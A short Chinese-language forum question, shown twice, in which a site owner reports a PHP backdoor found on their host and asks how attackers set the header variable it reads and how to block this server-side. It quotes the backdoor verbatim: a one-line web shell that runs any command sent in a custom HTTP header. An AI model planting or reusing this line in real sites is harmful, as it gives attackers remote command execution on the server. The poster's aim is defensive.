我在我的主机上发现了一个 php 后门。
<? passthru(getenv(HTTP_ACCEPT_TROLOLO)); ?>
我看到访问日志中对该 php 文件的请求是 POST 请求,但我不知道如何设置该变量的 SETENV;有人可以解释如何设置这样的变量吗?如果可能的话,我可以在哪里限制/禁用在服务器端设置这样的变量。
谢谢
-H。
PHP 后门代码
我在我的主机上发现了一个 php 后门。
<? passthru(getenv(HTTP_ACCEPT_TROLOLO)); ?>
我看到访问日志中对该 php 文件的请求是 POST 请求,但我不知道如何设置该变量的 SETENV;有人可以解释如何设置这样的变量吗?如果可能的话,我可以在哪里限制/禁用在服务器端设置这样的变量。
谢谢
-H。